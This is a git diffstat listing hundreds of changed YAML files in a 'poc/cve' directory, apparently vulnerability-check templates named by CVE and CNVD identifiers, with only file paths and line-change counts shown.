poc/cve/CVE-2014-4940.yaml | 25 +-
poc/cve/CVE-2014-4942.yaml | 32 +-
poc/cve/CVE-2014-9606.yaml | 21 +-
poc/cve/CVE-2014-9609.yaml | 19 +-
poc/cve/CVE-2015-0554.yaml | 4 -
poc/cve/CVE-2015-1880.yaml | 43 +-
poc/cve/CVE-2015-2166.yaml | 23 +-
poc/cve/CVE-2015-3306.yaml | 42 +-
poc/cve/CVE-2015-4050.yaml | 30 +-
poc/cve/CVE-2015-5471.yaml | 23 +-
poc/cve/CVE-2015-6544.yaml | 36 +-
poc/cve/CVE-2015-7780.yaml | 33 +-
poc/cve/CVE-2016-1000126.yaml | 29 +-
poc/cve/CVE-2016-1000128.yaml | 26 +-
poc/cve/CVE-2016-1000132.yaml | 21 +-
poc/cve/CVE-2016-1000134.yaml | 21 +-
poc/cve/CVE-2016-1000143.yaml | 26 +-
poc/cve/CVE-2016-1000146.yaml | 28 +-
poc/cve/CVE-2016-1000154.yaml | 27 +-
poc/cve/CVE-2016-1000155.yaml | 28 +-
poc/cve/CVE-2016-10367.yaml | 25 +-
poc/cve/CVE-2016-10940.yaml | 23 +-
poc/cve/CVE-2016-7552.yaml | 28 +-
poc/cve/CVE-2017-11586.yaml | 49 +-
poc/cve/CVE-2017-12542.yaml | 30 +-
poc/cve/CVE-2017-12794.yaml | 37 +-
poc/cve/CVE-2017-14524.yaml | 39 +-
poc/cve/CVE-2017-14535.yaml | 26 +-
poc/cve/CVE-2017-15647.yaml | 24 +-
poc/cve/CVE-2017-15944.yaml | 21 +-
poc/cve/CVE-2017-17451.yaml | 28 +-
poc/cve/CVE-2017-18536.yaml | 27 +-
poc/cve/CVE-2017-3528.yaml | 26 +-
poc/cve/CVE-2017-5521.yaml | 20 +-
poc/cve/CVE-2017-5631.yaml | 26 +-
poc/cve/CVE-2017-6090.yaml | 35 +-
poc/cve/CVE-2017-8917.yaml | 30 +-
poc/cve/CVE-2017-9805.yaml | 27 +-
poc/cve/CVE-2017-9822.yaml | 28 +-
poc/cve/CVE-2018-0101.yaml | 7 +-
poc/cve/CVE-2018-1000226.yaml | 54 +-
poc/cve/CVE-2018-1000856.yaml | 24 +-
poc/cve/CVE-2018-10230.yaml | 23 +-
poc/cve/CVE-2018-10818.yaml | 29 +-
poc/cve/CVE-2018-11231.yaml | 31 +-
poc/cve/CVE-2018-14064.yaml | 21 +-
poc/cve/CVE-2018-14912.yaml | 27 +-
poc/cve/CVE-2018-15517.yaml | 28 +-
poc/cve/CVE-2018-15535.yaml | 22 +-
poc/cve/CVE-2018-16133.yaml | 23 +-
poc/cve/CVE-2018-16167.yaml | 25 +-
poc/cve/CVE-2018-16288.yaml | 23 +-
poc/cve/CVE-2018-17422.yaml | 33 +-
poc/cve/CVE-2018-17431.yaml | 25 +-
poc/cve/CVE-2018-18608.yaml | 24 +-
poc/cve/CVE-2018-19752.yaml | 28 +-
poc/cve/CVE-2018-19877.yaml | 25 +-
poc/cve/CVE-2018-20010.yaml | 26 +-
poc/cve/CVE-2018-20011.yaml | 24 +-
poc/cve/CVE-2018-20462.yaml | 29 +-
poc/cve/CVE-2018-20470.yaml | 18 +-
poc/cve/CVE-2018-20985.yaml | 24 +-
poc/cve/CVE-2018-5233.yaml | 38 +-
poc/cve/CVE-2018-5316.yaml | 36 +-
poc/cve/CVE-2018-6008.yaml | 18 +-
poc/cve/CVE-2018-6200.yaml | 21 +-
poc/cve/CVE-2018-6910.yaml | 20 +-
poc/cve/CVE-2018-7251.yaml | 32 +-
poc/cve/CVE-2018-7467.yaml | 23 +-
poc/cve/CVE-2018-7700.yaml | 34 +-
poc/cve/CVE-2018-9118.yaml | 18 +-
"poc/cve/CVE-2018\342\200\22314064.yaml" | 9 +-
poc/cve/CVE-2019-1010287.yaml | 31 +-
poc/cve/CVE-2019-10692.yaml | 33 +-
poc/cve/CVE-2019-11013.yaml | 34 +-
poc/cve/CVE-2019-11248.yaml | 16 +-
poc/cve/CVE-2019-11370.yaml | 23 +-
poc/cve/CVE-2019-12276.yaml | 82 +-
poc/cve/CVE-2019-12962.yaml | 27 +-
poc/cve/CVE-2019-13101.yaml | 33 +-
poc/cve/CVE-2019-14251.yaml | 22 +-
poc/cve/CVE-2019-15713.yaml | 24 +-
poc/cve/CVE-2019-16123.yaml | 25 +-
poc/cve/CVE-2019-16931.yaml | 28 +-
poc/cve/CVE-2019-17418.yaml | 28 +-
poc/cve/CVE-2019-18665.yaml | 23 +-
poc/cve/CVE-2019-18818.yaml | 39 +-
poc/cve/CVE-2019-19824.yaml | 20 +-
poc/cve/CVE-2019-20210.yaml | 27 +-
poc/cve/CVE-2019-20224.yaml | 25 +-
poc/cve/CVE-2019-20933.yaml | 42 +-
poc/cve/CVE-2019-2616.yaml | 23 +-
poc/cve/CVE-2019-2767.yaml | 23 +-
poc/cve/CVE-2019-6340.yaml | 29 +-
poc/cve/CVE-2019-7238.yaml | 26 +-
poc/cve/CVE-2019-7609.yaml | 35 +-
poc/cve/CVE-2019-8446.yaml | 28 +-
poc/cve/CVE-2019-8937.yaml | 53 +-
poc/cve/CVE-2019-9082 (copy 2).yaml | 24 +
poc/cve/CVE-2019-9082.yaml | 1 -
poc/cve/CVE-2019-9915.yaml | 24 +-
poc/cve/CVE-2020-10124 (copy 1).yaml | 32 -
poc/cve/CVE-2020-10124.yaml | 3 +-
poc/cve/CVE-2020-11455.yaml | 29 +-
poc/cve/CVE-2020-11738.yaml | 38 +-
poc/cve/CVE-2020-11978.yaml | 46 +-
poc/cve/CVE-2020-11991.yaml | 93 +-
poc/cve/CVE-2020-13117.yaml | 36 +-
poc/cve/CVE-2020-13121.yaml | 41 +-
poc/cve/CVE-2020-13945.yaml | 22 +-
poc/cve/CVE-2020-14408.yaml | 29 +-
poc/cve/CVE-2020-19282.yaml | 31 +-
poc/cve/CVE-2020-19360.yaml | 21 +-
poc/cve/CVE-2020-2036.yaml | 69 +-
poc/cve/CVE-2020-20982.yaml | 33 +-
poc/cve/CVE-2020-22211.yaml | 19 +-
poc/cve/CVE-2020-24391.yaml | 22 +-
poc/cve/CVE-2020-27467.yaml | 18 +-
poc/cve/CVE-2020-27735.yaml | 85 +-
poc/cve/CVE-2020-28871.yaml | 36 +-
poc/cve/CVE-2020-28976.yaml | 42 +-
poc/cve/CVE-2020-29227.yaml | 18 +-
poc/cve/CVE-2020-35749.yaml | 19 +-
poc/cve/CVE-2020-35848.yaml | 39 +-
poc/cve/CVE-2020-36510.yaml | 29 +-
poc/cve/CVE-2020-5307.yaml | 83 +-
poc/cve/CVE-2020-7980.yaml | 22 +-
poc/cve/CVE-2020-8497.yaml | 20 +-
poc/cve/CVE-2020-8641.yaml | 22 +-
poc/cve/CVE-2020-8644.yaml | 40 +-
poc/cve/CVE-2020-8654.yaml | 42 +-
poc/cve/CVE-2020-9043.yaml | 36 +-
poc/cve/CVE-2020-9483.yaml | 99 +-
poc/cve/CVE-20200924a.yaml | 6 +
poc/cve/CVE-2021-20038.yaml | 50 +-
poc/cve/CVE-2021-20090.yaml | 88 +-
poc/cve/CVE-2021-20837.yaml | 52 +-
poc/cve/CVE-2021-21287.yaml | 18 +-
poc/cve/CVE-2021-21745.yaml | 20 +-
poc/cve/CVE-2021-21801.yaml | 31 +-
poc/cve/CVE-2021-21803.yaml | 34 +-
poc/cve/CVE-2021-22054.yaml | 17 +-
poc/cve/CVE-2021-22145.yaml | 33 +-
poc/cve/CVE-2021-22214.yaml | 25 +-
poc/cve/CVE-2021-22986.yaml | 45 +-
poc/cve/CVE-2021-23241.yaml | 24 +-
poc/cve/CVE-2021-24146.yaml | 31 +-
poc/cve/CVE-2021-24236.yaml | 31 +-
poc/cve/CVE-2021-24275.yaml | 37 +-
poc/cve/CVE-2021-24284.yaml | 25 +-
poc/cve/CVE-2021-24285.yaml | 35 +-
poc/cve/CVE-2021-24286.yaml | 63 +-
poc/cve/CVE-2021-24335.yaml | 29 +-
poc/cve/CVE-2021-24364.yaml | 26 +-
poc/cve/CVE-2021-24488.yaml | 24 +-
poc/cve/CVE-2021-24498.yaml | 37 +-
poc/cve/CVE-2021-24762.yaml | 38 +-
poc/cve/CVE-2021-24838.yaml | 32 +-
poc/cve/CVE-2021-24997.yaml | 33 +-
poc/cve/CVE-2021-25028.yaml | 34 +-
poc/cve/CVE-2021-25033.yaml | 22 +-
poc/cve/CVE-2021-25075.yaml | 26 +-
poc/cve/CVE-2021-25085.yaml | 24 +-
poc/cve/CVE-2021-25112.yaml | 34 +-
poc/cve/CVE-2021-25118.yaml | 35 +-
poc/cve/CVE-2021-26085.yaml | 35 +-
poc/cve/CVE-2021-26598.yaml | 32 +-
poc/cve/CVE-2021-27519.yaml | 26 +-
poc/cve/CVE-2021-27561.yaml | 18 +-
poc/cve/CVE-2021-27748.yaml | 22 +-
poc/cve/CVE-2021-28149.yaml | 33 +-
poc/cve/CVE-2021-28150.yaml | 38 +-
poc/cve/CVE-2021-28377.yaml | 21 +-
poc/cve/CVE-2021-28918.yaml | 23 +-
poc/cve/CVE-2021-29490.yaml | 37 +-
poc/cve/CVE-2021-31249.yaml | 37 +-
poc/cve/CVE-2021-31589.yaml | 39 +-
poc/cve/CVE-2021-31682.yaml | 36 +-
poc/cve/CVE-2021-31805.yaml | 21 +-
poc/cve/CVE-2021-3223.yaml | 29 +-
poc/cve/CVE-2021-32305.yaml | 19 +-
poc/cve/CVE-2021-32618.yaml | 22 +-
poc/cve/CVE-2021-33044.yaml | 33 +-
poc/cve/CVE-2021-33544.yaml | 37 +-
poc/cve/CVE-2021-33807.yaml | 24 +-
poc/cve/CVE-2021-34370.yaml | 38 +-
poc/cve/CVE-2021-34643.yaml | 37 +-
poc/cve/CVE-2021-35265.yaml | 42 +-
poc/cve/CVE-2021-35587.yaml | 37 +-
poc/cve/CVE-2021-36356.yaml | 31 +-
poc/cve/CVE-2021-37216.yaml | 40 +-
poc/cve/CVE-2021-37416.yaml | 36 +-
poc/cve/CVE-2021-37580.yaml | 18 +-
poc/cve/CVE-2021-38702.yaml | 28 +-
poc/cve/CVE-2021-38704.yaml | 20 +-
poc/cve/CVE-2021-38751.yaml | 25 +-
poc/cve/CVE-2021-39211.yaml | 23 +-
poc/cve/CVE-2021-39226.yaml | 38 +-
poc/cve/CVE-2021-39312.yaml | 23 +-
poc/cve/CVE-2021-40868.yaml | 29 +-
poc/cve/CVE-2021-40870.yaml | 36 +-
poc/cve/CVE-2021-40960.yaml | 23 +-
poc/cve/CVE-2021-40978.yaml | 26 +-
poc/cve/CVE-2021-41192.yaml | 29 +-
poc/cve/CVE-2021-41266.yaml | 31 +-
poc/cve/CVE-2021-41291.yaml | 22 +-
poc/cve/CVE-2021-41569.yaml | 22 +-
poc/cve/CVE-2021-41653.yaml | 29 +-
poc/cve/CVE-2021-41691.yaml | 19 +-
poc/cve/CVE-2021-4191.yaml | 25 +-
poc/cve/CVE-2021-42258.yaml | 49 +-
poc/cve/CVE-2021-43798.yaml | 43 +-
poc/cve/CVE-2021-44103.yaml | 14 +-
poc/cve/CVE-2021-44228.yaml | 78 +-
poc/cve/CVE-2021-44451.yaml | 71 +-
poc/cve/CVE-2021-44521.yaml | 50 +-
poc/cve/CVE-2021-44528.yaml | 28 +-
poc/cve/CVE-2021-45428.yaml | 21 +-
poc/cve/CVE-2021-45967.yaml | 27 +-
poc/cve/CVE-2021-45968.yaml | 28 +-
poc/cve/CVE-2021-46005.yaml | 25 +-
poc/cve/CVE-2021-46379.yaml | 17 +-
poc/cve/CVE-2021-46381.yaml | 22 +-
poc/cve/CVE-2021-46417.yaml | 20 +-
poc/cve/CVE-2021-46422.yaml | 24 +-
poc/cve/CVE-2022-0208.yaml | 37 +-
poc/cve/CVE-2022-0281.yaml | 31 +-
poc/cve/CVE-2022-0543.yaml | 30 +-
poc/cve/CVE-2022-0594.yaml | 26 +-
poc/cve/CVE-2022-0599.yaml | 35 +-
poc/cve/CVE-2022-0921.yaml | 57 +
poc/cve/CVE-2022-0952.yaml | 28 +-
poc/cve/CVE-2022-0968.yaml | 42 +-
poc/cve/CVE-2022-1020.yaml | 26 +-
poc/cve/CVE-2022-1221.yaml | 27 +-
poc/cve/CVE-2022-1392.yaml | 21 +-
poc/cve/CVE-2022-1597.yaml | 31 +-
poc/cve/CVE-2022-1713.yaml | 19 +-
poc/cve/CVE-2022-1815.yaml | 26 +-
poc/cve/CVE-2022-1904.yaml | 27 +-
poc/cve/CVE-2022-1906.yaml | 28 +-
poc/cve/CVE-2022-1937.yaml | 27 +-
poc/cve/CVE-2022-21705.yaml | 71 +-
poc/cve/CVE-2022-2187.yaml | 26 +-
poc/cve/CVE-2022-22536.yaml | 36 +-
poc/cve/CVE-2022-2290.yaml | 27 +-
poc/cve/CVE-2022-22972.yaml | 64 +-
poc/cve/CVE-2022-23808.yaml | 51 +-
poc/cve/CVE-2022-23944.yaml | 26 +-
poc/cve/CVE-2022-24681.yaml | 41 +-
poc/cve/CVE-2022-2486.yaml | 24 +-
poc/cve/CVE-2022-2487.yaml | 27 +-
poc/cve/CVE-2022-24899.yaml | 22 +-
poc/cve/CVE-2022-25323.yaml | 32 +-
poc/cve/CVE-2022-26134.yaml | 30 +-
poc/cve/CVE-2022-26135.yaml | 4 +
poc/cve/CVE-2022-26352.yaml | 23 +-
poc/cve/CVE-2022-26564.yaml | 23 +-
poc/cve/CVE-2022-26960.yaml | 17 +-
poc/cve/CVE-2022-27927.yaml | 22 +-
poc/cve/CVE-2022-28079.yaml | 22 +-
poc/cve/CVE-2022-28080.yaml | 25 +-
poc/cve/CVE-2022-29014.yaml | 25 +-
poc/cve/CVE-2022-29299.yaml | 14 +-
poc/cve/CVE-2022-29303.yaml | 27 +-
poc/cve/CVE-2022-29548.yaml | 31 +-
poc/cve/CVE-2022-30073.yaml | 42 +-
poc/cve/CVE-2022-30489.yaml | 24 +-
poc/cve/CVE-2022-30776.yaml | 25 +-
poc/cve/CVE-2022-30777.yaml | 26 +-
poc/cve/CVE-2022-32007.yaml | 21 +-
poc/cve/CVE-2022-32025.yaml | 27 +-
poc/cve/CVE-2022-32028.yaml | 27 +-
poc/cve/CVE-2022-32409.yaml | 25 +-
poc/cve/CVE-2022-32444.yaml | 16 +-
poc/cve/CVE-2022-33119.yaml | 22 +-
poc/cve/CVE-2022-34046.yaml | 29 +-
poc/cve/CVE-2022-34047.yaml | 29 +-
poc/cve/CVE-2022-34048.yaml | 26 +-
poc/cve/CVE-2022-34049.yaml | 23 +-
poc/cve/CVE-2022-35416.yaml | 22 +-
poc/cve/CVE-2023-23752.yaml | 52 +-
poc/cve/CVE-2023-34039.yaml | 67 +
poc/cve/CVE-2023-35047.yaml | 2 +-
poc/cve/CVE-2023-3836.yaml | 78 +-
poc/cve/CVE-2024-1183.yaml | 36 +
poc/cve/CVE-2024-32651.yaml | 57 +
poc/cve/CVE-2024-35668.yaml | 59 +
poc/cve/CVE-2024-3668.yaml | 59 +
poc/cve/CVE-2024-4468.yaml | 59 +
poc/cve/CVE-2024-4661.yaml | 59 +
poc/cve/CVE-2024-5087.yaml | 59 +
poc/cve/CVE-2024-5091.yaml | 59 +
poc/cve/CVE-2024-5613.yaml | 59 +
poc/cve/CVE-2024-5638.yaml | 59 +
poc/cve/CVE-2024-5654.yaml | 59 +
poc/cve/CVE-2024-5663.yaml | 59 +
poc/cve/CVE-2024-5758.yaml | 59 +
...5770-535af98dd21b180aed9353b26ab61bf4.yaml | 59 +
poc/cve/cnvd-2018-13393-1037.yaml | 12 +-
poc/cve/cnvd-2019-01348-1040.yaml | 7 +-
poc/cve/cnvd-2019-01348-1042.yaml | 33 -
poc/cve/cnvd-2019-01348-1043.yaml | 4 +-
poc/cve/cnvd-2019-01348-1044.yaml | 25 +
poc/cve/cnvd-2019-06255-1046.yaml | 37 +
poc/cve/cnvd-2019-06255-1050.yaml | 23 -
poc/cve/cnvd-2019-32204-1053.yaml | 23 +
poc/cve/cnvd-2019-32204-1054.yaml | 27 -
...67-1064.yaml => cnvd-2020-56167-1061.yaml} | 0
...22-1068.yaml => cnvd-2020-62422-1069.yaml} | 0
poc/cve/cnvd-2020-68596-1073.yaml | 36 -
poc/cve/cnvd-2020-68596-1074.yaml | 44 +
poc/cve/cnvd-2021-01931-1077.yaml | 16 +-
poc/cve/cnvd-2021-01931-1078.yaml | 26 +
poc/cve/cnvd-2021-10543-1082.yaml | 21 -
poc/cve/cnvd-2021-10543-1086.yaml | 6 +-
...36-1088.yaml => cnvd-2021-14536-1087.yaml} | 0
poc/cve/cnvd-2021-15822-1089.yaml | 27 -
poc/cve/cnvd-2021-15822-1093.yaml | 22 +
poc/cve/cnvd-2021-15822-1095.yaml | 7 +-
...24-1096.yaml => cnvd-2021-15824-1097.yaml} | 0
poc/cve/cnvd-2021-17369-1102.yaml | 12 +-
poc/cve/cnvd-2021-26422-1103.yaml | 38 -
poc/cve/cnvd-2021-28277-1105.yaml | 51 +
poc/cve/cnvd-2021-28277-1107.yaml | 10 +-
poc/cve/cnvd-2021-30167-1108.yaml | 36 -
...04-1113.yaml => cnvd-2021-49104-1114.yaml} | 0
poc/cve/cnvd-2022-03672-1116.yaml | 42 +
poc/cve/cnvd-2022-03672-1117.yaml | 45 -
poc/cve/cve-2000-0114-1297.yaml | 32 +
poc/cve/cve-2002-1131-1304.yaml | 43 +
poc/cve/cve-2007-4504-1342.yaml | 25 -
poc/cve/cve-2008-6222.yaml | 31 +
poc/cve/cve-2008-6668-1400.yaml | 28 -
poc/cve/cve-2009-0545.yaml | 40 +
poc/cve/cve-2009-1496.yaml | 31 -
poc/cve/cve-2009-2015-1441.yaml | 26 -
poc/cve/cve-2009-2100-1446.yaml | 37 -
poc/cve/cve-2009-3053.yaml | 31 -
poc/cve/cve-2010-0943.yaml | 30 +
poc/cve/cve-2010-0972-1522.yaml | 26 -
poc/cve/cve-2010-0982.yaml | 30 +
poc/cve/cve-2010-1056.yaml | 30 -
poc/cve/cve-2010-1302-1567.yaml | 28 -
poc/cve/cve-2010-1305-1574.yaml | 26 -
poc/cve/cve-2010-1307-1585.yaml | 26 -
poc/cve/cve-2010-1308.yaml | 29 -
poc/cve/cve-2010-1312-1598.yaml | 28 +
poc/cve/cve-2010-1312.yaml | 30 +
poc/cve/cve-2010-1313-1604.yaml | 30 +
poc/cve/cve-2010-1314.yaml | 30 -
poc/cve/cve-2010-1315.yaml | 30 +
poc/cve/cve-2010-1345-1621.yaml | 27 +
poc/cve/cve-2010-1345.yaml | 29 +
poc/cve/cve-2010-1352.yaml | 30 -
poc/cve/cve-2010-1353-1630.yaml | 28 -
poc/cve/cve-2010-1469.yaml | 30 +
poc/cve/cve-2010-1470-1653.yaml | 30 +
poc/cve/cve-2010-1474.yaml | 29 -
poc/cve/cve-2010-1491.yaml | 30 -
poc/cve/cve-2010-1494.yaml | 29 +
poc/cve/cve-2010-1532.yaml | 30 -
poc/cve/cve-2010-1540-1729.yaml | 28 -
poc/cve/cve-2010-1657-1761.yaml | 27 -
poc/cve/cve-2010-1658-1765.yaml | 28 +
poc/cve/cve-2010-1658.yaml | 30 +
poc/cve/cve-2010-1659-1773.yaml | 28 -
poc/cve/cve-2010-1714-1779.yaml | 30 +
poc/cve/cve-2010-1715.yaml | 30 -
poc/cve/cve-2010-1717-1789.yaml | 30 -
poc/cve/cve-2010-1718.yaml | 30 -
poc/cve/cve-2010-1858.yaml | 30 -
poc/cve/cve-2010-1953-1841.yaml | 27 +
poc/cve/cve-2010-1981.yaml | 34 +
poc/cve/cve-2010-1982.yaml | 34 +
poc/cve/cve-2010-2682-1960.yaml | 32 +
poc/cve/cve-2010-2920.yaml | 33 -
poc/cve/cve-2010-3203-1987.yaml | 34 +
poc/cve/cve-2010-3203.yaml | 34 +
poc/cve/cve-2010-4239-1997.yaml | 28 -
poc/cve/cve-2010-4617.yaml | 33 -
poc/cve/cve-2010-5028-2025.yaml | 29 +
poc/cve/cve-2010-5278-2030.yaml | 32 +
poc/cve/cve-2010-5278.yaml | 35 +
poc/cve/cve-2011-2744.yaml | 33 -
poc/cve/cve-2011-3315-2059.yaml | 25 -
poc/cve/cve-2011-4926.yaml | 51 +
poc/cve/cve-2011-5179.yaml | 48 -
poc/cve/cve-2012-0896-2132.yaml | 31 -
poc/cve/cve-2012-0981.yaml | 33 +
poc/cve/cve-2012-2371.yaml | 50 +
poc/cve/cve-2012-4273-2198.yaml | 33 +
poc/cve/cve-2012-4768-2207.yaml | 32 +
poc/cve/cve-2013-5528.yaml | 33 -
poc/cve/cve-2013-5979-2280.yaml | 28 -
poc/cve/cve-2013-7240.yaml | 40 +
poc/cve/cve-2014-2962-2313.yaml | 25 +
poc/cve/cve-2014-4561-2375.yaml | 35 -
poc/cve/cve-2014-4940.yaml | 32 -
poc/cve/cve-2014-9094.yaml | 49 +
poc/cve/cve-2014-9606-2430.yaml | 35 +
poc/cve/cve-2014-9609-2437.yaml | 33 +
poc/cve/cve-2015-0554-2456.yaml | 32 -
poc/cve/cve-2015-1880-2477.yaml | 31 -
poc/cve/cve-2015-2166.yaml | 33 -
poc/cve/cve-2015-3306-2502.yaml | 32 -
poc/cve/cve-2015-4050.yaml | 27 -
poc/cve/cve-2015-7780-2604.yaml | 36 +
poc/cve/cve-2016-1000128-2651.yaml | 32 -
poc/cve/cve-2016-1000132-2669.yaml | 41 -
poc/cve/cve-2016-1000134-2678.yaml | 41 -
poc/cve/cve-2016-1000143-2717.yaml | 33 -
poc/cve/cve-2016-1000154-2740.yaml | 34 +
poc/cve/cve-2016-10940-2757.yaml | 45 -
poc/cve/cve-2016-6210.yaml | 33 -
poc/cve/cve-2016-7552-2812.yaml | 34 -
poc/cve/cve-2017-12542-2884.yaml | 38 +
poc/cve/cve-2017-12615.yaml | 70 -
poc/cve/cve-2017-14535-2928.yaml | 38 -
poc/cve/cve-2017-15647-2955.yaml | 28 -
poc/cve/cve-2017-15944-2965.yaml | 33 +
poc/cve/cve-2017-17451-2983.yaml | 34 -
poc/cve/cve-2017-18536-2995.yaml | 32 -
poc/cve/cve-2017-3528-3012.yaml | 28 -
poc/cve/cve-2017-5487.yaml | 67 -
poc/cve/cve-2017-5521-3027.yaml | 40 +
poc/cve/cve-2017-5631-3031.yaml | 34 +
poc/cve/cve-2017-6090-3044.yaml | 44 -
poc/cve/cve-2017-7391.yaml | 49 -
poc/cve/cve-2017-8917-3078.yaml | 29 +
poc/cve/cve-2017-9805-3104.yaml | 93 +
poc/cve/cve-2017-9822-3106.yaml | 36 +
poc/cve/cve-2018-1000129.yaml | 57 +
poc/cve/cve-2018-1000226-3139.yaml | 51 -
poc/cve/cve-2018-10818-3171.yaml | 40 -
poc/cve/cve-2018-11409.yaml | 46 +
poc/cve/cve-2018-1271.yaml | 23 +-
poc/cve/cve-2018-14064-3301.yaml | 30 -
poc/cve/cve-2018-14728.yaml | 40 -
poc/cve/cve-2018-14912-3315.yaml | 27 -
poc/cve/cve-2018-15517-3331.yaml | 29 -
poc/cve/cve-2018-16133-3358.yaml | 31 -
poc/cve/cve-2018-16167-3359.yaml | 29 +
poc/cve/cve-2018-16288-3365.yaml | 32 +
poc/cve/cve-2018-17422-3421.yaml | 34 -
poc/cve/cve-2018-17431-3423.yaml | 38 +
poc/cve/cve-2018-19386.yaml | 42 -
poc/cve/cve-2018-19752(1).yaml | 52 -
poc/cve/cve-2018-19877(1).yaml | 35 -
poc/cve/cve-2018-20010(1).yaml | 47 -
poc/cve/cve-2018-20011(1).yaml | 47 +
poc/cve/cve-2018-20470-3497.yaml | 39 -
poc/cve/cve-2018-20985-3507.yaml | 35 -
poc/cve/cve-2018-3167.yaml | 47 -
poc/cve/cve-2018-5233-3567.yaml | 34 -
poc/cve/cve-2018-6008-3574.yaml | 36 +
poc/cve/cve-2018-6200-3578.yaml | 32 -
poc/cve/cve-2018-6910-3585.yaml | 31 +
poc/cve/cve-2018-7251-3587.yaml | 31 -
poc/cve/cve-2018-7467-3598.yaml | 31 +
poc/cve/cve-2018-7700-3618.yaml | 33 +
poc/cve/cve-2018-9118-3654.yaml | 39 -
"poc/cve/cve-2018\342\200\22314064(1).yaml" | 21 +
poc/cve/cve-2019-1010287-3696.yaml | 36 +
poc/cve/cve-2019-10692(1).yaml | 35 +
poc/cve/cve-2019-11013-3719.yaml | 19 +
poc/cve/cve-2019-11248-3731.yaml | 37 -
poc/cve/cve-2019-11370(1).yaml | 39 -
poc/cve/cve-2019-12962(1).yaml | 40 +
poc/cve/cve-2019-13101-3802.yaml | 37 -
poc/cve/cve-2019-14251(1).yaml | 31 +
poc/cve/cve-2019-15713-3887.yaml | 37 +
poc/cve/cve-2019-16097.yaml | 54 -
poc/cve/cve-2019-16123-3918.yaml | 31 -
poc/cve/cve-2019-16278.yaml | 44 +
poc/cve/cve-2019-16931(1).yaml | 41 -
poc/cve/cve-2019-17418-3981.yaml | 30 -
poc/cve/cve-2019-17558.yaml | 74 +
poc/cve/cve-2019-18394.yaml | 39 +
poc/cve/cve-2019-18665(1).yaml | 30 +
poc/cve/cve-2019-18818-4021.yaml | 52 +
poc/cve/cve-2019-19368.yaml | 44 +
poc/cve/cve-2019-19824-4053.yaml | 33 -
poc/cve/cve-2019-20210(1).yaml | 37 -
poc/cve/cve-2019-20224(1).yaml | 48 -
poc/cve/cve-2019-20933(1).yaml | 32 +
poc/cve/cve-2019-2616(1).yaml | 29 -
poc/cve/cve-2019-2767-4117.yaml | 27 -
poc/cve/cve-2019-6340(1).yaml | 34 +
poc/cve/cve-2019-7238-4207.yaml | 37 +
poc/cve/cve-2019-7609-4233.yaml | 35 +
poc/cve/cve-2019-8446-4252.yaml | 39 -
poc/cve/cve-2019-8903.yaml | 45 -
poc/cve/cve-2019-8937-4278.yaml | 36 +
poc/cve/cve-2019-9082-4292.yaml | 23 -
poc/cve/cve-2019-9915(1).yaml | 32 +
poc/cve/cve-2020-10124(1).yaml | 31 +
poc/cve/cve-2020-10220.yaml | 50 -
poc/cve/cve-2020-11455-4397.yaml | 32 -
poc/cve/cve-2020-11530.yaml | 48 +
poc/cve/cve-2020-11738(1).yaml | 45 +
poc/cve/cve-2020-11978(1).yaml | 57 +
poc/cve/cve-2020-13117-4489.yaml | 29 +
poc/cve/cve-2020-13121(1).yaml | 24 +
poc/cve/cve-2020-13945-4535.yaml | 58 +
poc/cve/cve-2020-14181.yaml | 45 -
poc/cve/cve-2020-14408(1).yaml | 35 -
poc/cve/cve-2020-14882.yaml | 46 +
poc/cve/cve-2020-19282-4706.yaml | 33 -
poc/cve/cve-2020-19360-4714.yaml | 30 +
poc/cve/cve-2020-2036-4730.yaml | 34 -
poc/cve/cve-2020-20982-4740.yaml | 35 -
poc/cve/cve-2020-22211(1).yaml | 32 -
poc/cve/cve-2020-22840.yaml | 39 +
poc/cve/cve-2020-24223.yaml | 49 +
poc/cve/cve-2020-24391-4811.yaml | 53 -
poc/cve/cve-2020-25540.yaml | 44 -
poc/cve/cve-2020-27467-4950.yaml | 31 -
poc/cve/cve-2020-28976-4989.yaml | 30 +
poc/cve/cve-2020-29227-5000.yaml | 30 +
poc/cve/cve-2020-29395.yaml | 50 +
poc/cve/cve-2020-3452(1).yaml | 31 +
poc/cve/cve-2020-3452.yaml | 24 +-
poc/cve/cve-2020-35749-5075.yaml | 46 +
poc/cve/cve-2020-36510(1).yaml | 35 +
poc/cve/cve-2020-6287.yaml | 64 -
poc/cve/cve-2020-7980(1).yaml | 40 -
poc/cve/cve-2020-8194.yaml | 49 +
poc/cve/cve-2020-8497-5317.yaml | 32 +
poc/cve/cve-2020-8641-5330.yaml | 32 +
poc/cve/cve-2020-8654(1).yaml | 41 +
poc/cve/cve-2020-9043(1).yaml | 64 +
poc/cve/cve-20200924a.yaml | 33 +
poc/cve/cve-2021-20038-5443.yaml | 38 +
poc/cve/cve-2021-21287-5492.yaml | 38 -
poc/cve/cve-2021-21745(1).yaml | 34 +
poc/cve/cve-2021-21801-5531.yaml | 32 +
poc/cve/cve-2021-21803-5536.yaml | 27 +
poc/cve/cve-2021-22054(1).yaml | 32 +
poc/cve/cve-2021-22145-5591.yaml | 37 +
poc/cve/cve-2021-22214-5601.yaml | 41 -
poc/cve/cve-2021-22986-5612.yaml | 60 +
poc/cve/cve-2021-23241-5621.yaml | 30 +
poc/cve/cve-2021-24146-5631.yaml | 32 -
poc/cve/cve-2021-24236(1).yaml | 80 -
poc/cve/cve-2021-24275-5661.yaml | 32 -
poc/cve/cve-2021-24284(1).yaml | 62 -
poc/cve/cve-2021-24285-5673.yaml | 33 -
poc/cve/cve-2021-24286(1).yaml | 21 -
poc/cve/cve-2021-24335-5703.yaml | 34 +
poc/cve/cve-2021-24364-5721.yaml | 32 +
poc/cve/cve-2021-24488(1).yaml | 40 +
poc/cve/cve-2021-24498-5751.yaml | 31 -
poc/cve/cve-2021-24838-5769.yaml | 28 -
poc/cve/cve-2021-25033(1).yaml | 27 -
poc/cve/cve-2021-25075(1).yaml | 53 -
poc/cve/cve-2021-25085(1).yaml | 37 +
poc/cve/cve-2021-25118(1).yaml | 39 +
poc/cve/cve-2021-26085(1).yaml | 34 +
poc/cve/cve-2021-27519(1).yaml | 38 -
poc/cve/cve-2021-27748(1).yaml | 33 +
poc/cve/cve-2021-28149-5943.yaml | 43 -
poc/cve/cve-2021-28150-5949.yaml | 39 -
poc/cve/cve-2021-28377(1).yaml | 27 +
poc/cve/cve-2021-28918-5975.yaml | 37 +
poc/cve/cve-2021-29490-6011.yaml | 28 +
poc/cve/cve-2021-29622.yaml | 38 -
poc/cve/cve-2021-30461.yaml | 38 +
poc/cve/cve-2021-31249-6068.yaml | 23 -
poc/cve/cve-2021-3129.yaml | 94 -
poc/cve/cve-2021-31589-6095.yaml | 35 +
